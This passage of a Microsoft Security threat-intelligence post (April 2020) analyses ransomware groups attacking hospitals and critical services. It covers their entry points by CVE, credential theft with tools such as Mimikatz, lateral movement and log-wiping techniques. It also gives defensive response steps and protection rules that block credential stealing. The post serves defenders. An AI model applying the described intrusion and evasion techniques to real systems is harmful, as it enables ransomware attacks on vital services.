RDP servers. The attacks delivered a wide range of payloads, but they all used the same techniques observed in human-operated ransomware campaigns: credential theft and lateral movement, culminating in the deployment of a ransomware payload of the attacker\u2019s choice. Because the ransomware infections are at the tail end of protracted attacks, defenders should focus on hunting for signs of adversaries performing credential theft and lateral movement activities to prevent the deployment of ransomware.\n\nIn this blog, we share our in-depth analysis of these ransomware campaigns. Below, we will cover:\n\n * Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n * A motley crew of ransomware payloads\n * Immediate response actions for active attacks\n * Building security hygiene to defend networks against human-operated ransomware\n * Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWe have included additional technical details including hunting guidance and recommended prioritization for security operations (SecOps).\n\n## Vulnerable and unmonitored internet-facing systems provide easy access to human-operated attacks\n\nWhile the recent attacks deployed various ransomware strains, many of the campaigns shared infrastructure with previous ransomware campaigns and used the same techniques commonly observed in human-operated ransomware attacks.\n\nIn stark contrast to attacks that deliver ransomware via email\u2014which tend to unfold much faster, with ransomware deployed within an hour of initial entry\u2014the attacks we saw in April are similar to the Doppelpaymer ransomware campaigns from 2019, where attackers gained access to affected networks months in advance. They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware.\n\nTo gain access to target networks, the recent ransomware campaigns exploited internet-facing systems with the following weaknesses:\n\n * Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication (MFA)\n * Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak passwords\n * Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers\n * Citrix Application Delivery Controller (ADC) systems affected by [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)\n * Pulse Secure VPN systems affected by [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nApplying security patches for internet-facing systems is critical in preventing these attacks. It\u2019s also important to note that, although Microsoft security researchers have not observed the recent attacks exploiting the following vulnerabilities, historical signals indicate that these campaigns may eventually exploit them to gain access, so they are worth reviewing: [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), [CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>), [CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>).\n\nLike many breaches, attackers employed credential theft, lateral movement capabilities using common tools, including Mimikatz and Cobalt Strike, network reconnaissance, and data exfiltration. In these specific campaigns, the operators gained access to highly privileged administrator credentials and were ready to take potentially more destructive action if disturbed. On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt. In addition, while only a few of these groups gained notoriety for selling data, almost all of them were observed viewing and exfiltrating data during these attacks, even if they have not advertised or sold yet.\n\nAs with all human-operated ransomware campaigns, these recent attacks spread throughout an environment affecting email identities, endpoints, inboxes, applications, and more. Because it can be challenging even for experts to ensure complete removal of attackers from a fully compromised network, it\u2019s critical that vulnerable internet-facing systems are proactively patched and mitigations put in place to reduce the risk from these kinds of attacks.\n\n## A motley crew of ransomware payloads\n\nWhile individual campaigns and ransomware families exhibited distinct attributes as described in the sections below, these human-operated ransomware campaigns tended to be variations on a common attack pattern. They unfolded in similar ways and employed generally the same attack techniques. Ultimately, the specific ransomware payload at the end of each attack chain was almost solely a stylistic choice made by the attackers.\n\n\n\n### RobbinHood ransomware\n\nRobbinHood ransomware operators gained some attention for [exploiting vulnerable drivers](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) late in their attack chain to turn off security software. However, like many other human-operated ransomware campaigns, they typically start with an RDP brute-force attack against an exposed asset. They eventually obtain privileged credentials, mostly local administrator accounts with shared or common passwords, and service accounts with domain admin privileges. RobbinHood operators, like Ryuk and other well-publicized ransomware groups, leave behind new local and Active Directory user accounts, so they can regain access after their malware and tools have been removed.\n\n### Vatet loader\n\nAttackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.\n\nThe group behind this tool appears to be particularly intent on targeting hospitals, as well as aid organizations, insulin providers, medical device manufacturers, and other critical verticals. They are one of the most prolific ransomware operators during this time and have caused dozens of cases.\n\nUsing Vatet and Cobalt Strike, the group has delivered various ransomware payloads. More recently, they have been deploying in-memory ransomware that utilizes Alternate Data Streams (ADS) and displays simplistic ransom notes copied from older ransomware families. To access target networks, they exploit [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>), brute force RDP endpoints, and send email containing .lnk files that launch malicious PowerShell commands. Once inside a network, they steal credentials, including those stored in the Credential Manager vault, and move laterally until they gain domain admin privileges. The group has been observed exfiltrating data prior to deploying ransomware.\n\n### NetWalker ransomware\n\nNetWalker campaign operators gained notoriety for targeting hospitals and healthcare providers with emails claiming to provide information about COVID-19. These emails also delivered NetWalker ransomware directly as a .vbs attachment, a technique that has gained media attention. However, the campaign operators also compromised networks using misconfigured IIS-based applications to launch Mimikatz and steal credentials, which they then used to launch PsExec, and eventually deploying the same NetWalker ransomware.\n\n### PonyFinal ransomware\n\nThis Java-based ransomware had been considered a novelty, but the campaigns deploying PonyFinal weren\u2019t unusual. Campaign operators compromised internet-facing web systems and obtained privileged credentials. To establish persistence, they used PowerShell commands to launch the system tool mshta.exe and set up a reverse shell based on a common PowerShell attack framework. They also used legitimate tools, such as Splashtop, to maintain remote desktop connections.\n\n### Maze ransomware\n\nOne of the first ransomware campaigns to make headlines for selling stolen data, Maze continues to target technology providers and public services. Maze has a history of going after managed service providers (MSPs) to gain access to the data and networks of MSP customers.\n\nMaze has been delivered via email, but campaign operators have also deployed Maze to networks after gaining access using common vectors, such as RDP brute force. Once inside a network, they perform credential theft, move laterally to access resources and exfiltrate data, and then deploy ransomware.\n\nIn a recent campaign, Microsoft security researchers tracked Maze operators establishing access through an internet-facing system by performing RDP brute force against the local administrator account. Using the brute-forced password, campaign operators were able to move laterally because built-in administrator accounts on other endpoints used the same passwords.\n\nAfter gaining control over a domain admin account through credential theft, campaign operators used Cobalt Strike, PsExec, and a plethora of other tools to deploy various payloads and access data. They established fileless persistence using scheduled tasks and services that launched PowerShell-based remote shells. They also turned on Windows Remote Management for persistent control using stolen domain admin privileges. To weaken security controls in preparation for ransomware deployment, they manipulated various settings through Group Policy.\n\n### REvil ransomware\n\nPossibly the first ransomware group to take advantage of the network device vulnerabilities in Pulse VPN to steal credentials to access networks, REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers \u2013 and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments. REvil attacks are differentiated in their uptake of new vulnerabilities, but their techniques overlap with many other groups, relying on credential theft tools like Mimikatz once in the network and performing lateral movement and reconnaissance with tools like PsExec.\n\n### Other ransomware families\n\nOther ransomware families used in human-operated campaigns during this period include:\n\n * Paradise, which used to be distributed directly via email but is now used in human-operated ransomware attacks\n * RagnarLocker, which is deployed by a group that heavily uses RDP and Cobalt Strike with stolen credentials\n * MedusaLocker, which is possibly deployed via existing Trickbot infections\n * LockBit, which is distributed by operators that use the publicly available penetration testing tool CrackMapExec to move laterally\n\n## Immediate response actions for active attacks\n\nWe highly recommend that organizations immediately check if they have any alerts related to these ransomware attacks and prioritize investigation and remediation. Malicious behaviors relevant to these attacks that defenders should pay attention to include:\n\n * Malicious PowerShell, Cobalt Strike, and other penetration-testing tools that can allow attacks to blend in as benign red team activities\n * Credential theft activities, such as suspicious access to Local Security Authority Subsystem Service (LSASS) or suspicious registry modifications, which can indicate new attacker payloads and tools for stealing credentials\n * Any tampering with a security event log, forensic artifact such as the USNJournal, or a security agent, which attackers do to evade detections and to erase chances of recovering data\n\nCustomers using [Microsoft Defender Advanced Threat Protection (ATP)](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>) can consult a companion [threat analytics](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/threat-analytics>) report for more details on relevant alerts, as well as advanced hunting queries. Customers subscribed to the [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) service can also refer to the [targeted attack notification](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts#targeted-attack-notification>), which has detailed timelines of attacks, recommended mitigation steps for disrupting attacks, and remediation advice.\n\nIf your network is affected, perform the following scoping and investigation activities immediately to understand the impact of this breach. Using indicators of compromise (IOCs) alone to determine impact from these threats is not a durable solution, as most of these ransomware campaigns employ \u201cone-time use\u201d infrastructure for campaigns, and often change their tools and systems once they determine the detection capabilities of their targets. Detections and mitigations should concentrate on holistic behavioral based hunting where possible, and hardening infrastructure weaknesses favored by these attackers as soon as possible.\n\n### Investigate affected endpoints and credentials\n\nInvestigate endpoints affected by these attacks and identify all the credentials present on those endpoints. Assume that these credentials were available to attackers and that all associated accounts are compromised. Note that attackers can not only dump credentials for accounts that have logged on to interactive or RDP sessions, but can also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry.\n\n * For endpoints onboarded to [Microsoft Defender ATP](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>), use advanced hunting to identify accounts that have logged on to affected endpoints. The threat analytics report contains a hunting query for this purpose.\n * Otherwise, check the Windows Event Log for post-compromise logons\u2014those that occur after or during the earliest suspected breach activity\u2014with event ID 4624 and logon type 2 or 10. For any other timeframe, check for logon type 4 or 5.\n\n### Isolate compromised endpoints\n\nIsolate endpoints that have command-and-control beacons or have been lateral movement targets. Locate these endpoints using advanced hunting queries or other methods of directly searching for related IOCs. [Isolate machines](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts#isolate-machines-from-the-network>) using Microsoft Defender ATP, or use other data sources, such as NetFlow, and search through your SIEM or other centralized event management solutions. Look for lateral movement from known affected endpoints.\n\n### Address internet-facing weaknesses\n\nIdentify perimeter systems that attackers might have utilized to access your network. You can use a public scanning interface, such as [_shodan.io_](<https://www.shodan.io/>), to augment your own data. Systems that should be considered of interest to attackers include:\n\n * RDP or Virtual Desktop endpoints without MFA\n * Citrix ADC systems affected by CVE-2019-19781\n * Pulse Secure VPN systems affected by CVE-2019-11510\n * Microsoft SharePoint servers affected by CVE-2019-0604\n * Microsoft Exchange servers affected by CVE-2020-0688\n * Zoho ManageEngine systems affected by CVE-2020-10189\n\nTo further reduce organizational exposure, Microsoft Defender ATP customers can use the [Threat and Vulnerability Management (TVM)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations. TVM allows security administrators and IT administrators to collaborate seamlessly to remediate issues.\n\n### Inspect and rebuild devices with related malware infections\n\nMany ransomware operators enter target networks through existing infections of malware like Emotet and Trickbot. These malware families, traditionally considered to be banking trojans, have been used to deliver all kinds of payloads, including persistent implants. Investigate and remediate any known infections and consider them possible vectors for sophisticated human adversaries. Ensure that you check for exposed credentials, additional payloads, and lateral movement prior to rebuilding affected endpoints or resetting passwords.\n\n## Building security hygiene to defend networks against human-operated ransomware\n\nAs ransomware operators continue to compromise new targets, defenders should proactively assess risk using all available tools. You should continue to enforce proven preventive solutions\u2014credential hygiene, minimal privileges, and host firewalls\u2014to stymie these attacks, which have been consistently observed taking advantage of security hygiene issues and over-privileged credentials.\n\nApply these measures to make your network more resilient against new breaches, reactivation of dormant implants, or lateral movement:\n\n * Randomize local administrator passwords using a tool such as LAPS.\n * Apply [Account Lockout Policy](<https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/account-lockout-policy>).\n * Ensure good perimeter security by patching exposed systems. Apply mitigating factors, such as MFA or vendor-supplied mitigation guidance, for vulnerabilities.\n * Utilize [host firewalls to limit lateral movement](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>). Preventing endpoints from communicating on TCP port 445 for SMB will have limited negative impact on most networks, but can significantly disrupt adversary activities.\n * Turn on cloud-delivered protection for Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Follow standard guidance in the [security baselines](<https://techcommunity.microsoft.com/t5/microsoft-security-baselines/bg-p/Microsoft-Security-Baselines>) for Office and Office 365 and the Windows security baselines. Use [Microsoft Secure Score](<https://docs.microsoft.com/en-us/microsoft-365/security/mtp/microsoft-secure-score-preview>) assesses to measures security posture and get recommended improvement actions, guidance, and control.\n * Turn on [tamper protection](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Tamper-protection-now-generally-available-for-Microsoft-Defender/ba-p/911482>) features to prevent attackers from stopping security services.\n * Turn on [attack surface reduction rules](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>), including rules that can block ransomware activity: \n * Use advanced protection against ransomware\n * Block process creations originating from PsExec and WMI commands\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n\nFor additional guidance on improving defenses against human-operated ransomware and building better security posture against cyberattacks in general, read [Human-operated ransomware attacks: A preventable disaster](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n\n## Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWhat we\u2019ve learned from the increase in ransomware deployments in April is that attackers pay no attention to the real-world consequences of disruption in services\u2014in this time of global crisis\u2014that their attacks cause.\n\nHuman-operated ransomware attacks represent a different level of threat because adversaries are adept at systems administration and security misconfigurations and can therefore adapt to any path of least resistance they find in a compromised network. If they run into a wall, they try to break through. And if they can\u2019t break through a wall, they\u2019ve shown that they can skillfully find other ways to move forward with their attack. As a result, human-operated ransomware attacks are complex and wide-reaching. No two attacks are exactly the same.\n\n[Microsoft Threat Protections (MTP)](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides coordinated defenses that uncover the complete attack chain and help block sophisticated attacks like human-operated ransomware. MTP combines the capabilities of multiple Microsoft 365 security services to orchestrate protection, prevention, detection, and response across endpoints, email, identities, and apps.\n\nThrough built-in intelligence, automation, and integration, MTP can block attacks, eliminate their persistence, and auto-heal affected assets. It correlates signals and consolidates alerts to help defenders prioritize incidents for investigation and response. MTP also provides a unique cross-domain hunting capability that can further help defenders identify attack sprawl and get org-specific insights for hardening defenses.\n\nMicrosoft Threat Protection is also part of a [chip-to-cloud security approach](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) that combines threat defense on the silicon, operating system, and cloud. Hardware-backed security features on Windows 10 like address space layout randomization (ASLR), Control Flow Guard (CFG), and others harden the platform against many advanced threats, including ones that take advantage of vulnerable kernel drivers. These platform security features seamlessly integrate with Microsoft Defender ATP, providing end-to-end security that starts from a strong hardware root of trust. On [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers>) these mitigations are enabled by default.\n\nWe continue to work with our customers, partners, and the research community to track human-operated ransomware and other sophisticated attacks. For dire cases customers can use available services like the [Microsoft Detection and Response (DART) team](<https://www.microsoft.com/security/blog/microsoft-detection-and-response-team-dart-blog-series/>) to help investigate and remediate.\n\n \n\n_Microsoft Threat Protection Intelligence Team_\n\n \n\n## Appendix: MITRE ATT&amp;CK techniques observed\n\nHuman-operated ransomware campaigns employ a broad range of techniques made possible by attacker control over privileged domain accounts. The techniques listed here are techniques commonly used during attacks against healthcare and critical services in April 2020.\n\nCredential access\n\n * [T1003 Credential Dumping](<https://attack.mitre.org/techniques/T1003/>) | Use of LaZagne, Mimikatz, LsaSecretsView, and other credential dumping tools and exploitation of [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) on vulnerable endpoints\n\nPersistence\n\n * [T1084 Windows Management Instrumentation Event Subscription](<https://attack.mitre.org/techniques/T1084/>) | WMI event subscription\n * [T1136 Create Account](<https://attack.mitre.org/techniques/T1136/>) | Creation of new accounts for RDP\n\nCommand and control\n\n * [T1043 Commonly Used Port](<https://attack.mitre.org/techniques/T1043/>) | Use of port 443\n\nDiscovery\n\n * [T1033 System Owner/User Discovery](<https://attack.mitre.org/techniques/T1033/>) | Various commands\n * [T1087 Account Discovery](<https://attack.mitre.org/techniques/T1087/>) | LDAP and AD queries and other commands\n * [T1018 Remote System Discovery](<https://attack.mitre.org/techniques/T1018/>) | Pings, qwinsta, and other tools and commands\n * [T1482 Domain Trust Discovery](<https://attack.mitre.org/techniques/T1482/>) | Domain trust enumeration using Nltest\n\nExecution\n\n * [T1035 Service Execution](<https://attack.mitre.org/techniques/T1035/>) | Service registered to run CMD (as ComSpec) and PowerShell commands\n\nLateral movement\n\n * [T1076 Remote Desktop Protocol](<https://attack.mitre.org/techniques/T1076/>) | Use of RDP to reach other machines in the network\n * [T1105 Remote File Copy](<https://attack.mitre.org/techniques/T1105/>) | Lateral movement using WMI and PsExec\n\nDefense evasion\n\n * [T1070 Indicator Removal on Host](<https://attack.mitre.org/techniques/T1070/>) | Clearing of event logs using wevutil, removal of USNJournal using fsutil, and deletion of slack space on drive using cipher.exe\n * [T1089 Disabling Security Tools](<https://attack.mitre.org/techniques/T1089/>) | Stopping or tampering with antivirus and other security using ProcessHacker and exploitation of vulnerable software drivers\n\nImpact\n\n * [T1489 Service Stop](<https://attack.mitre.org/techniques/T1489/>) | Stopping of services prior to encryption\n * [T1486 Data Encrypted for Impact](<https://attack.mitre.org/techniques/T1486/>) | Ransomware encryption\n\nThe post [Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) appeared first on [Microsoft Security.", "modified": "2020-04-28T16:00:49", "published": "2020-04-28T16:00:49", "id": "MSSECURE:E3C8B97294453D962741782EC959E79C", "href": "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "type": "mssecure", "title": "Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}